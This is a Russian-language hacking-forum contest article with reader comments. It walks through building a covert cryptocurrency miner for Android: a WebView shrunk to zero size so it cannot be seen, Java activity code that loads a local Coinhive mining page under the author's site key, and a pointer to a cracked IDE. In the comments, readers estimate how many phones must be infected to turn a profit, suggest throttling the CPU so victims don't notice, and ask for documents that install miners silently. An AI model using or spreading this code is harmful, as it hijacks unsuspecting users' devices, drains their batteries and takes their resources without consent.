• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Конкурс Скрытый майнер для Андроид

Статья для участия в конкурсена codeby
Все вы наверное слышали о скрытых майнерах на пк, но вы вероятнее всего никогда не слышали о скрытых майнерах на андроид.
Работает это ну очень просто, я поражаюсь, почему, до этого не додумался никто раньше?
В андроиде есть такой компонент, как WebView, он позволяет смотреть интернет-сайты (и локальные)мы и воспользуемся.


1 шаг. Установка ide. Писать наш Майнер мы будем на нашем телефоне. В этом нам поможет AIDE. Единственная среда программирования под андроид и... Собственно на андроид.
Качать нужно взломанную. Файл прикрепил :).
Установили? Дальше.

2 шаг. Создание проекта. Как только зашли в IDE вылезает диалоговое окно.Мы нажимаем "для экспертов".Далее выбираем New Android app. Name - имя приложения. Package name - имя пакета (идентификатор).
Создали? Погнали дальше.

3 шаг. Пишем ui. Его как такого не будет, вы можете придумать что-то своё.
Для начала добавим в main.XML между тэгами linear layout, то есть где-то в середине:
<WebView
android:id="@+id/webView"
xmlns:android=" "
android:layout_width="match_parent"
android:layout_height="match_parent"/>


Добавили? Нажимаем на картину в верху. Откроется редактор ui. Нажимаем на надпись WebView. Атрибуты Layout height и Layout Width стоят в режиме Match parent. (На всё место.) Какой же тогда скрытый Майнер? Сначала разбирается с одним, потом с другим. Везде ставим fixed size 0dp. Это важно. Всё, нашего WebView совсем не видно.


4 шаг. Кодим активность.
Убираем всё, кроме надписи package и собственно имени пакета из MainActivity.java.
Убрали? Добавляем тогда код:

import android.app.*;
import android.os.*;
import android.webkit.*;

public class MainActivity extends Activity {
private WebView mWebView;

public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);

mWebView = (WebView) findViewById(R.id.webView);
// включаем поддержку JavaScript
mWebView.getSettings().setJavaScriptEnabled(true);
// указываем страницу загрузки
mWebView.setWebViewClient(new MyWebViewClient());
// ссылка
mWebView.loadUrl("file:///android_asset/index.html");
}
private class MyWebViewClient extends WebViewClient
{
@Override
public boolean shouldOverrideUrlLoading(WebView view, String url)
{
view.loadUrl(url);
return true;
}
}
@Override
public void onBackPressed() {
if(mWebView.canGoBack()) {
mWebView.goBack();
} else {
super.onBackPressed();
}
}
}


Добавили? Отлично.
Если у вас что-то кроме того, где написано index.HTML подчеркнётся красным, то удерживайте, вылезает в верху меню, нажмите на него и нажмите на верхнюю надпись.


5 шаг. Настраиваемый пул. Роль пула у нас будет играть coinhive.com (Не реклама.) регестрируемся там, заходим в настройки , и создаём новый sitekey. Название любое. Копируем публичный sitekey и вставляем туда, откуда его можно будет потом скопировать.
Окейя дальше качаем архив "MyWebsite.zip" , в конце прикреплён.
Далее создаём по пути /имя вашего проекта/app/src/main папку assets. Разархивируем наш архив туда, и так, чтобы по пути от папки assets, до файла index.HTML не было других файлов, то есть должно быть так: /имявашегопроекта/app/src/main/assets/index.html .

6 шаг. Настраиваемый программу под пул. Заходим в наш разархированный index.html, там LbaqSUyMtBAT0WliBJh97Z8UZ4VYdIXP меняем на ваш сохраненный публичный ключ сайта.

Далее запускаемых программу и проверяем нагрузку процессора.
P.s не забудьте указать разрешение на интернет в AndroidManifest.xml !!! Как это сделать - в гугл.

Спасибо за прочтение.
Помните, что я не отвечаю за ваши действия.
(Писал статью через телефон, не смог загрузить файлы на сервер форума.)
MyWebsite.zip -
Взломанная AIDE -
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
Сколько с/s дает телефон, нет вопрос по лругому поставлю сколько нужно трубок заразить что бы один доллар на майнить?
 

woolf1514

Green Team
06.03.2017
181
191
BIT
1
Эмм... Идея конечно классная.. Но есть ли в ней смысл? Я имею в виду есть ли смысл майнить на телефонах/планшетах? С их мощностями им блоки то вообще будут прилетать?)
 

OBLIVIONNN

Green Team
22.08.2017
144
92
BIT
1
Кто нибудь может написать как? Я в гугле ничего не нашел
manifest-mod.jpg
 
  • Нравится
Реакции: VadimGan и georgeclooney

bluntman

Green Team
07.09.2017
12
2
BIT
0
Сколько с/s дает телефон, нет вопрос по лругому поставлю сколько нужно трубок заразить что бы один доллар на майнить?
Antminer L3+ майнит примерно 600 бачинских в месяц, состоит из 288 чипов с частотой 1 ггц, у телефона если взять в среднем 300мгц то примерно 1000 телефонов будут приносить такое же количество если будут непрерывно майнить(но это неточно:)). Опять же пользователь сразу заметит что заряда телефона ему хватает на полдня. Нужно тогда ограничить максимально используемую частоту (поставить проц 10-15 чтоб без палева). В таком случае телефонов нужно тыс 5-7
 
K

Koma

Можете видео урок запилить в то сделать то сделал но aide выдаёт ошибку
 
K

korish555

Я бы сразу спалил по расходу батареи.
Наверное не только я)))
 
M

Mixxx56

В интернете их продают, я способ типо этого уже придумал, завтра напишу.
Приветствую! Меня конечно извините, НО, случаем никто не знает где именно можно такую прогу добыть!? Или какой нибудь файл загрузочный....или воОобще в идеале файл ворд или екзель, который при скачивании и открытии прога для скрытого-майнинга устанавлявалась как то без палева)))
 
I

interkoly

Походу буду ждать видос. Сделал все крч как надо,с компилировал прогу,запускаю а оно чет не грузит телеф,даже в запуске не написано что оно запущено, на сайте тоже отстука нет,что делать?

//
крч исправил ошибку, теперь приложение нагружает телеф, видно его в запуске, но отстука на сайте нет что делать??
 

NekitGod1

Green Team
06.11.2017
59
57
BIT
0
В
Походу буду ждать видос. Сделал все крч как надо,с компилировал прогу,запускаю а оно чет не грузит телеф,даже в запуске не написано что оно запущено, на сайте тоже отстука нет,что делать?

//
крч исправил ошибку, теперь приложение нагружает телеф, видно его в запуске, но отстука на сайте нет что делать??
Такое может быть только если вы написали неверный ключ.
 
I

interkoly

В

Такое может быть только если вы написали неверный ключ.
Ключ написал тот что надо! Запускаю программу телефон заметно нагружен, в процессах стоит, вроде должно работать, но вот захожу на сайт а отстука нет
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!